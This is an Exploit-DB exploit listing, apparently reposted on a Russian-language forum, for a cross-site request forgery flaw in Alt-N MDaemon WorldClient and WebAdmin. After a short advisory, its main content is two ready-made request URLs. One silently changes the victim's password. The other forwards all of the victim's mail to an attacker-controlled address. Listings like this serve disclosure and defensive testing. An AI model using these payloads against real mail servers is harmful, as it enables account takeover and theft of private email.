- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38325
- Проверка EDB
-
- Пройдено
- Автор
- QSECURE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2013-02-18
Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery
Код:
source: https://www.securityfocus.com/bid/58076/info
MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n
http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com
- Источник
- www.exploit-db.com